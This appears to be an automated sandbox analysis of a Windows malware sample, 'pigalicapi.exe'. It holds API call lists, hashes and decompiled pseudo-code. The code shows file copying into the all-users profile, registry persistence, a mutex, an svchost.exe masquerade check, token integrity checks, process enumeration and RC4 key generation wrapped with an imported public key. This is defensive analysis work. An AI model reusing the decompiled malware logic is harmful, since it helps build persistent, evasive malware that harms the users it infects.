                                                                                                                                                                                                                                                                            0x01173f8a
                                                                                                                                                                                                                                                                            0x01173eb1
                                                                                                                                                                                                                                                                            0x01173ecc
                                                                                                                                                                                                                                                                            0x01173ed1
                                                                                                                                                                                                                                                                            0x01173ed9
                                                                                                                                                                                                                                                                            0x01173f81
                                                                                                                                                                                                                                                                            0x01173edf
                                                                                                                                                                                                                                                                            0x01173efa
                                                                                                                                                                                                                                                                            0x01173eff
                                                                                                                                                                                                                                                                            0x01173f07
                                                                                                                                                                                                                                                                            0x01173f78
                                                                                                                                                                                                                                                                            0x01173f09
                                                                                                                                                                                                                                                                            0x01173f09
                                                                                                                                                                                                                                                                            0x01173f22
                                                                                                                                                                                                                                                                            0x01173f43
                                                                                                                                                                                                                                                                            0x01173f48
                                                                                                                                                                                                                                                                            0x01173f50
                                                                                                                                                                                                                                                                            0x01173f52
                                                                                                                                                                                                                                                                            0x01173f52
                                                                                                                                                                                                                                                                            0x01173f60
                                                                                                                                                                                                                                                                            0x01173f70
                                                                                                                                                                                                                                                                            0x01173f70
                                                                                                                                                                                                                                                                            0x01173f76
                                                                                                                                                                                                                                                                            0x01173f7f
                                                                                                                                                                                                                                                                            0x01173f88
                                                                                                                                                                                                                                                                            0x01173f9a
                                                                                                                                                                                                                                                                            0x01173fa3
                                                                                                                                                                                                                                                                            0x01173fd7
                                                                                                                                                                                                                                                                            0x01173fd9
                                                                                                                                                                                                                                                                            0x01173fe3
                                                                                                                                                                                                                                                                            0x01173fe3
                                                                                                                                                                                                                                                                            0x01173fa5
                                                                                                                                                                                                                                                                            0x01173fac
                                                                                                                                                                                                                                                                            0x01173fc4
                                                                                                                                                                                                                                                                            0x01173fae
                                                                                                                                                                                                                                                                            0x01173fae
                                                                                                                                                                                                                                                                            0x01173fb8
                                                                                                                                                                                                                                                                            0x01173fb8
                                                                                                                                                                                                                                                                            0x01173fce
                                                                                                                                                                                                                                                                            0x01173fa3
                                                                                                                                                                                                                                                                            0x01173ff4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01173ff4

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\pigalicapi.exe,00000208), ref: 01173B2D
                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(01175DB0), ref: 01173B38
                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 01173B40
                                                                                                                                                                                                                                                                              • Part of subcall function 01174510: GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 0117456C
                                                                                                                                                                                                                                                                              • Part of subcall function 01174510: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0117458B
                                                                                                                                                                                                                                                                              • Part of subcall function 01174510: GetFileSize.KERNEL32(000000FF,00000000), ref: 011745AD
                                                                                                                                                                                                                                                                              • Part of subcall function 01174510: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 011745D6
                                                                                                                                                                                                                                                                              • Part of subcall function 01174510: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 01174617
                                                                                                                                                                                                                                                                              • Part of subcall function 01174510: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0117463E
                                                                                                                                                                                                                                                                              • Part of subcall function 01174510: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 011747C0
                                                                                                                                                                                                                                                                              • Part of subcall function 01174510: CloseHandle.KERNEL32(00000000), ref: 011747E0
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0117400C
                                                                                                                                                                                                                                                                              • Part of subcall function 01175700: GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 01175742
                                                                                                                                                                                                                                                                              • Part of subcall function 01175700: lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 011757B8
                                                                                                                                                                                                                                                                              • Part of subcall function 01175700: GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 011757F1
                                                                                                                                                                                                                                                                              • Part of subcall function 01175700: wnsprintfA.SHLWAPI ref: 0117582F
                                                                                                                                                                                                                                                                              • Part of subcall function 01175700: CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01175854
                                                                                                                                                                                                                                                                              • Part of subcall function 01175700: GetFileSize.KERNEL32(000000FF,00000000), ref: 0117586D
                                                                                                                                                                                                                                                                              • Part of subcall function 01175A00: lstrcpyA.KERNEL32(Qawoqmsckgkay,WDefault), ref: 01175A47
                                                                                                                                                                                                                                                                              • Part of subcall function 01175A00: lstrlenA.KERNEL32(0117C4E0), ref: 01175A7D
                                                                                                                                                                                                                                                                              • Part of subcall function 01175A00: lstrcpyA.KERNEL32(00000000,0117C4E0), ref: 01175A97
                                                                                                                                                                                                                                                                              • Part of subcall function 01175A00: lstrlenA.KERNEL32(00000000), ref: 01175AA1
                                                                                                                                                                                                                                                                              • Part of subcall function 01175A00: lstrlenA.KERNEL32(Qawoqmsckgkay), ref: 01175AAE
                                                                                                                                                                                                                                                                              • Part of subcall function 01175A00: lstrcatA.KERNEL32(00000000,Qawoqmsckgkay), ref: 01175AC8
                                                                                                                                                                                                                                                                              • Part of subcall function 01175A00: RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 01175B00
                                                                                                                                                                                                                                                                              • Part of subcall function 01175A00: RegCloseKey.KERNEL32(00000000), ref: 01175B0E
                                                                                                                                                                                                                                                                              • Part of subcall function 01175A00: lstrlenA.KERNEL32(00000000), ref: 01175B3B
                                                                                                                                                                                                                                                                              • Part of subcall function 01179400: lstrcpyA.KERNEL32(?,00000000), ref: 01179513
                                                                                                                                                                                                                                                                              • Part of subcall function 01179400: CharUpperA.USER32(?), ref: 01179521
                                                                                                                                                                                                                                                                              • Part of subcall function 011799F0: GetCurrentProcess.KERNEL32(00000008,?), ref: 01179A0A
                                                                                                                                                                                                                                                                              • Part of subcall function 011799F0: OpenProcessToken.ADVAPI32(00000000), ref: 01179A11
                                                                                                                                                                                                                                                                              • Part of subcall function 011799F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 01179A3A
                                                                                                                                                                                                                                                                              • Part of subcall function 011799F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 01179A77
                                                                                                                                                                                                                                                                              • Part of subcall function 011799F0: CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 01179AAD
                                                                                                                                                                                                                                                                              • Part of subcall function 011799F0: EqualSid.ADVAPI32(?,00000000), ref: 01179AC3
                                                                                                                                                                                                                                                                              • Part of subcall function 01176060: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 01176082
                                                                                                                                                                                                                                                                              • Part of subcall function 01175E00: CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,01173BEB), ref: 01175E0C
                                                                                                                                                                                                                                                                              • Part of subcall function 01175E00: GetLastError.KERNEL32(?,01173BEB), ref: 01175E12
                                                                                                                                                                                                                                                                            • StrStrIA.SHLWAPI(C:\Users\user\pigalicapi.exe,svchost.exe), ref: 01173BFA
                                                                                                                                                                                                                                                                              • Part of subcall function 01171120: lstrlenA.KERNEL32(00000000), ref: 01171148
                                                                                                                                                                                                                                                                              • Part of subcall function 01171120: lstrlenA.KERNEL32(00000000), ref: 0117115A
                                                                                                                                                                                                                                                                              • Part of subcall function 01171120: GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 01171182
                                                                                                                                                                                                                                                                              • Part of subcall function 01171120: wnsprintfA.SHLWAPI ref: 011711BD
                                                                                                                                                                                                                                                                              • Part of subcall function 01171120: lstrcmpiA.KERNEL32(00000104,?), ref: 011711D1
                                                                                                                                                                                                                                                                              • Part of subcall function 01171120: CopyFileA.KERNEL32(00000104,?,00000000), ref: 011711F0
                                                                                                                                                                                                                                                                              • Part of subcall function 01171120: SetFileAttributesA.KERNEL32(?,00000006), ref: 011711FF
                                                                                                                                                                                                                                                                              • Part of subcall function 01171120: lstrcpyA.KERNEL32(00000104,?), ref: 01171210
                                                                                                                                                                                                                                                                              • Part of subcall function 01171120: lstrcpyA.KERNEL32(00000000,?), ref: 01171249
                                                                                                                                                                                                                                                                              • Part of subcall function 01171120: lstrcpyA.KERNEL32(-00000208,00000000), ref: 0117125D
                                                                                                                                                                                                                                                                              • Part of subcall function 01171120: CreateThread.KERNEL32 ref: 01171274
                                                                                                                                                                                                                                                                              • Part of subcall function 01175E30: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 01175E7E
                                                                                                                                                                                                                                                                              • Part of subcall function 01175E30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 01175EB2
                                                                                                                                                                                                                                                                              • Part of subcall function 01175E30: RegDeleteValueA.ADVAPI32(00000000,?), ref: 01175ED6
                                                                                                                                                                                                                                                                              • Part of subcall function 01175E30: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 01175F0B
                                                                                                                                                                                                                                                                              • Part of subcall function 01175E30: RegCloseKey.KERNEL32(00000000), ref: 01175F19
                                                                                                                                                                                                                                                                              • Part of subcall function 01176CF0: RegOpenKeyExA.KERNEL32(80000001,01183B88,00000000,000F003F,00000000), ref: 01176D30
                                                                                                                                                                                                                                                                              • Part of subcall function 01176CF0: RegQueryValueExA.KERNEL32(00000000,01183FA6,00000000,00000003,?,00000020), ref: 01176D61
                                                                                                                                                                                                                                                                              • Part of subcall function 01176CF0: RegDeleteValueA.ADVAPI32(00000000,01183FA6), ref: 01176D7E
                                                                                                                                                                                                                                                                              • Part of subcall function 01176CF0: RegCloseKey.ADVAPI32(00000000), ref: 01176D88
                                                                                                                                                                                                                                                                              • Part of subcall function 01175F30: lstrcpyA.KERNEL32(?,pigalicapi), ref: 01175F67
                                                                                                                                                                                                                                                                              • Part of subcall function 01175F30: lstrcatA.KERNEL32(?,01183FE2), ref: 01175F7A
                                                                                                                                                                                                                                                                              • Part of subcall function 01175F30: RegOpenKeyExA.ADVAPI32(80000001,01173C58,00000000,000F003F,00000000), ref: 01175FB3
                                                                                                                                                                                                                                                                              • Part of subcall function 01175F30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 01175FF2
                                                                                                                                                                                                                                                                              • Part of subcall function 01175F30: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 0117603B
                                                                                                                                                                                                                                                                              • Part of subcall function 01175F30: RegCloseKey.ADVAPI32(00000000), ref: 01176045
                                                                                                                                                                                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 01173C85
                                                                                                                                                                                                                                                                              • Part of subcall function 01174020: InitializeCriticalSection.KERNEL32(?), ref: 01174066
                                                                                                                                                                                                                                                                              • Part of subcall function 01174020: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0117407A
                                                                                                                                                                                                                                                                              • Part of subcall function 01174020: EnterCriticalSection.KERNEL32(?,?), ref: 011740AF
                                                                                                                                                                                                                                                                              • Part of subcall function 01174020: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 011740C6
                                                                                                                                                                                                                                                                              • Part of subcall function 01174020: TerminateThread.KERNEL32(00000000,00000000), ref: 011740E6
                                                                                                                                                                                                                                                                              • Part of subcall function 01174020: ResetEvent.KERNEL32(00000000), ref: 011740F7
                                                                                                                                                                                                                                                                              • Part of subcall function 01174020: LeaveCriticalSection.KERNEL32(?), ref: 01174101
                                                                                                                                                                                                                                                                              • Part of subcall function 01174020: CreateThread.KERNEL32 ref: 01174118
                                                                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 01173F70
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(?), ref: 01173FF4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$Createlstrcpy$Value$Closelstrlen$ModuleNameOpenVirtual$CriticalFreeProcessQuerySectionThreadToken$DeleteDirectoryEventInformationInitializeProfileSizeUserslstrcatwnsprintf$AllocAttributesChangeCharCopyCurrentEnterEqualErrorExceptionExitFilterFindHandleKnownLastLeaveMutexNotificationReadResetSleepStartupTerminateUnhandledUpperWelllstrcmpi
                                                                                                                                                                                                                                                                            • String ID: C:\Users\user\pigalicapi.exe$Lyoxokxeruqp$R+g$pigalicapi$svchost.exe
                                                                                                                                                                                                                                                                            • API String ID: 1389186475-1208453679
                                                                                                                                                                                                                                                                            • Opcode ID: 43a1b5c7d0647a2cf07ffbaf7506b4296fc71d7b9e1b7bc957e2938dc029679d
                                                                                                                                                                                                                                                                            • Instruction ID: 58774099047dbafcb04499a25ce405193373f2ac9461b8e9b2b76c24de1168e0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43a1b5c7d0647a2cf07ffbaf7506b4296fc71d7b9e1b7bc957e2938dc029679d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5FC106B1948376AAEB3CEB64AC09BBE77B06B14744F0480FDE568662C5DB7046C4CF52
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 744 1178800-1178811 745 1178817-117881b 744->745 746 117895c-1178962 744->746 745->746 747 1178821-1178843 CryptAcquireContextA 745->747 748 1178845-1178855 GetLastError 747->748 749 117887a-117887e 747->749 750 1178857-117885e 748->750 751 1178860-1178874 CryptAcquireContextA 748->751 749->746 752 1178884-11788b7 CryptGenKey 749->752 750->749 750->751 751->749 753 1178950-1178956 CryptReleaseContext 752->753 754 11788bd-11788d7 CryptExportKey 752->754 753->746 755 1178946-117894a CryptDestroyKey 754->755 756 11788d9-11788dd 754->756 755->753 757 117893f 756->757 758 11788df-11788e3 756->758 757->755 758->757 759 11788e5-11788e9 758->759 759->757 760 11788eb-11788ef 759->760 760->757 761 11788f1-1178914 CryptImportKey 760->761 762 1178916-1178937 CryptExportKey CryptDestroyKey 761->762 763 117893d 761->763 762->763 763->755
                                                                                                                                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                                                                                                                                            			E01178800(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, BYTE* _a20, int _a24) {
                                                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                                                            				long* _v12;
                                                                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                                                                            				long* _v20;
                                                                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				long* _v32;
                                                                                                                                                                                                                                                                            				char* _t41;
                                                                                                                                                                                                                                                                            				int _t42;
                                                                                                                                                                                                                                                                            				signed int _t43;
                                                                                                                                                                                                                                                                            				intOrPtr _t46;
                                                                                                                                                                                                                                                                            				int _t49;
                                                                                                                                                                                                                                                                            				int _t51;
                                                                                                                                                                                                                                                                            				char* _t71;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v12 = 0;
                                                                                                                                                                                                                                                                            					_t41 =  *0x1183370; // 0x117c6e4
                                                                                                                                                                                                                                                                            					_t42 = CryptAcquireContextA( &_v12, _t41, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                            					if(_t42 == 0) {
                                                                                                                                                                                                                                                                            						_v16 = GetLastError();
                                                                                                                                                                                                                                                                            						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                            							_t71 =  *0x1183370; // 0x117c6e4
                                                                                                                                                                                                                                                                            							CryptAcquireContextA( &_v12, _t71, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						_v28 = 0x80;
                                                                                                                                                                                                                                                                            						_v20 = 0;
                                                                                                                                                                                                                                                                            						_v24 = _v28 << 0x00000010 | 0x00000001;
                                                                                                                                                                                                                                                                            						_t43 = _v24;
                                                                                                                                                                                                                                                                            						__imp__CryptGenKey(_v12, 0x6801, _t43,  &_v20);
                                                                                                                                                                                                                                                                            						if(_t43 != 0) {
                                                                                                                                                                                                                                                                            							_t46 = _a4;
                                                                                                                                                                                                                                                                            							__imp__CryptExportKey(_v20, 0, 8, 0, _t46, _a8);
                                                                                                                                                                                                                                                                            							if(_t46 != 0) {
                                                                                                                                                                                                                                                                            								if(_a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
                                                                                                                                                                                                                                                                            									_v8 = 1;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_v32 = 0;
                                                                                                                                                                                                                                                                            									_t49 = CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v32); // executed
                                                                                                                                                                                                                                                                            									if(_t49 != 0) {
                                                                                                                                                                                                                                                                            										_t51 = _v20;
                                                                                                                                                                                                                                                                            										__imp__CryptExportKey(_t51, _v32, 1, 0, _a12, _a16); // executed
                                                                                                                                                                                                                                                                            										_v8 = _t51;
                                                                                                                                                                                                                                                                            										CryptDestroyKey(_v32);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L19;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                                                            0x01178806
                                                                                                                                                                                                                                                                            0x01178811
                                                                                                                                                                                                                                                                            0x0117895c
                                                                                                                                                                                                                                                                            0x01178962
                                                                                                                                                                                                                                                                            0x01178821
                                                                                                                                                                                                                                                                            0x01178821
                                                                                                                                                                                                                                                                            0x01178831
                                                                                                                                                                                                                                                                            0x0117883b
                                                                                                                                                                                                                                                                            0x01178843
                                                                                                                                                                                                                                                                            0x0117884b
                                                                                                                                                                                                                                                                            0x01178855
                                                                                                                                                                                                                                                                            0x01178869
                                                                                                                                                                                                                                                                            0x01178874
                                                                                                                                                                                                                                                                            0x01178874
                                                                                                                                                                                                                                                                            0x01178855
                                                                                                                                                                                                                                                                            0x0117887e
                                                                                                                                                                                                                                                                            0x01178884
                                                                                                                                                                                                                                                                            0x0117888b
                                                                                                                                                                                                                                                                            0x0117889b
                                                                                                                                                                                                                                                                            0x011788a2
                                                                                                                                                                                                                                                                            0x011788af
                                                                                                                                                                                                                                                                            0x011788b7
                                                                                                                                                                                                                                                                            0x011788c1
                                                                                                                                                                                                                                                                            0x011788cf
                                                                                                                                                                                                                                                                            0x011788d7
                                                                                                                                                                                                                                                                            0x011788dd
                                                                                                                                                                                                                                                                            0x0117893f
                                                                                                                                                                                                                                                                            0x011788f1
                                                                                                                                                                                                                                                                            0x011788f1
                                                                                                                                                                                                                                                                            0x0117890c
                                                                                                                                                                                                                                                                            0x01178914
                                                                                                                                                                                                                                                                            0x01178926
                                                                                                                                                                                                                                                                            0x0117892a
                                                                                                                                                                                                                                                                            0x01178930
                                                                                                                                                                                                                                                                            0x01178937
                                                                                                                                                                                                                                                                            0x01178937
                                                                                                                                                                                                                                                                            0x0117893d
                                                                                                                                                                                                                                                                            0x011788dd
                                                                                                                                                                                                                                                                            0x0117894a
                                                                                                                                                                                                                                                                            0x0117894a
                                                                                                                                                                                                                                                                            0x01178956
                                                                                                                                                                                                                                                                            0x01178956
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117887e

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,01178420,00000000,00001000,00000000), ref: 0117883B
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 01178845
                                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 01178874
                                                                                                                                                                                                                                                                            • CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 011788AF
                                                                                                                                                                                                                                                                            • CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 011788CF
                                                                                                                                                                                                                                                                            • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 0117890C
                                                                                                                                                                                                                                                                            • CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 0117892A
                                                                                                                                                                                                                                                                            • CryptDestroyKey.ADVAPI32(?), ref: 01178937
                                                                                                                                                                                                                                                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 0117894A
                                                                                                                                                                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 01178956
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 01178864
                                                                                                                                                                                                                                                                            • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0117882C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$Context$AcquireDestroyExport$ErrorImportLastRelease
                                                                                                                                                                                                                                                                            • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                            • API String ID: 3052018297-947817771
                                                                                                                                                                                                                                                                            • Opcode ID: 55a0e1a80aafc3fc3eeb54a33c43aceb7b88dc44a4cb6e723e7da0cdf09b3e7c
                                                                                                                                                                                                                                                                            • Instruction ID: f85f67d2d1833c04cc2cc2cf04acd74a1b300390d34c674b013d31c9159c5c08
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55a0e1a80aafc3fc3eeb54a33c43aceb7b88dc44a4cb6e723e7da0cdf09b3e7c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E413C75A0020AEFEB29CF98C849FEF7BB9BB44704F148518F615A6380D7B49584CFA1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                                                                            			E01171CA0(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                                                                            				char _v272;
                                                                                                                                                                                                                                                                            				long _v284;
                                                                                                                                                                                                                                                                            				intOrPtr _v300;
                                                                                                                                                                                                                                                                            				void* _v308;
                                                                                                                                                                                                                                                                            				void* _v312;
                                                                                                                                                                                                                                                                            				long _v316;
                                                                                                                                                                                                                                                                            				long _v320;
                                                                                                                                                                                                                                                                            				void* _v324;
                                                                                                                                                                                                                                                                            				char _v328;
                                                                                                                                                                                                                                                                            				int _v332;
                                                                                                                                                                                                                                                                            				void* _t44;
                                                                                                                                                                                                                                                                            				int _t47;
                                                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                                                            				void* _t61;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                                                                            				_t44 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                                                                                                                                                                            				_v312 = _t44;
                                                                                                                                                                                                                                                                            				if(_v312 == 0xffffffff) {
                                                                                                                                                                                                                                                                            					L18:
                                                                                                                                                                                                                                                                            					return _v5;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v308 = 0x128;
                                                                                                                                                                                                                                                                            				_t47 = Process32First(_v312,  &_v308); // executed
                                                                                                                                                                                                                                                                            				if(_t47 == 0) {
                                                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                                                            					CloseHandle(_v312);
                                                                                                                                                                                                                                                                            					goto L18;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v320 = GetCurrentProcessId();
                                                                                                                                                                                                                                                                            				_v316 = 0;
                                                                                                                                                                                                                                                                            				while(_v300 != _v320) {
                                                                                                                                                                                                                                                                            					_t50 = Process32Next(_v312,  &_v308); // executed
                                                                                                                                                                                                                                                                            					if(_t50 != 0) {
                                                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                                                                            					if(_v316 != 0 && Process32First(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                            						while(_v300 != _v316) {
                                                                                                                                                                                                                                                                            							if(Process32Next(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							goto L17;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(lstrlenA( &_v272) < _a8) {
                                                                                                                                                                                                                                                                            							lstrcpyA(_a4,  &_v272);
                                                                                                                                                                                                                                                                            							_v324 = OpenProcess(0x410, 0, _v316);
                                                                                                                                                                                                                                                                            							if(_v324 != 0) {
                                                                                                                                                                                                                                                                            								_v332 = 0;
                                                                                                                                                                                                                                                                            								_push( &_v332);
                                                                                                                                                                                                                                                                            								_push(4);
                                                                                                                                                                                                                                                                            								_push( &_v328);
                                                                                                                                                                                                                                                                            								_t61 = _v324;
                                                                                                                                                                                                                                                                            								_push(_t61); // executed
                                                                                                                                                                                                                                                                            								L0117B1D4(); // executed
                                                                                                                                                                                                                                                                            								if(_t61 == 0) {
                                                                                                                                                                                                                                                                            									_push(_a8);
                                                                                                                                                                                                                                                                            									_push(_a4);
                                                                                                                                                                                                                                                                            									_push(_v324); // executed
                                                                                                                                                                                                                                                                            									L0117B1C8(); // executed
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_push(_a8);
                                                                                                                                                                                                                                                                            									_push(_a4);
                                                                                                                                                                                                                                                                            									_push(_v328);
                                                                                                                                                                                                                                                                            									_push(_v324);
                                                                                                                                                                                                                                                                            									L0117B1CE();
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v5 = 1;
                                                                                                                                                                                                                                                                            								FindCloseChangeNotification(_v324); // executed
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v316 = _v284;
                                                                                                                                                                                                                                                                            				goto L6;
                                                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                                                            0x01171ca9
                                                                                                                                                                                                                                                                            0x01171cb1
                                                                                                                                                                                                                                                                            0x01171cb6
                                                                                                                                                                                                                                                                            0x01171cc3
                                                                                                                                                                                                                                                                            0x01171e51
                                                                                                                                                                                                                                                                            0x01171e57
                                                                                                                                                                                                                                                                            0x01171e57
                                                                                                                                                                                                                                                                            0x01171cc9
                                                                                                                                                                                                                                                                            0x01171ce1
                                                                                                                                                                                                                                                                            0x01171ce8
                                                                                                                                                                                                                                                                            0x01171e44
                                                                                                                                                                                                                                                                            0x01171e4b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01171e4b
                                                                                                                                                                                                                                                                            0x01171cf4
                                                                                                                                                                                                                                                                            0x01171cfa
                                                                                                                                                                                                                                                                            0x01171d04
                                                                                                                                                                                                                                                                            0x01171d2e
                                                                                                                                                                                                                                                                            0x01171d35
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01171d37
                                                                                                                                                                                                                                                                            0x01171d3e
                                                                                                                                                                                                                                                                            0x01171d5f
                                                                                                                                                                                                                                                                            0x01171e3e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01171e3e
                                                                                                                                                                                                                                                                            0x01171d81
                                                                                                                                                                                                                                                                            0x01171d92
                                                                                                                                                                                                                                                                            0x01171dac
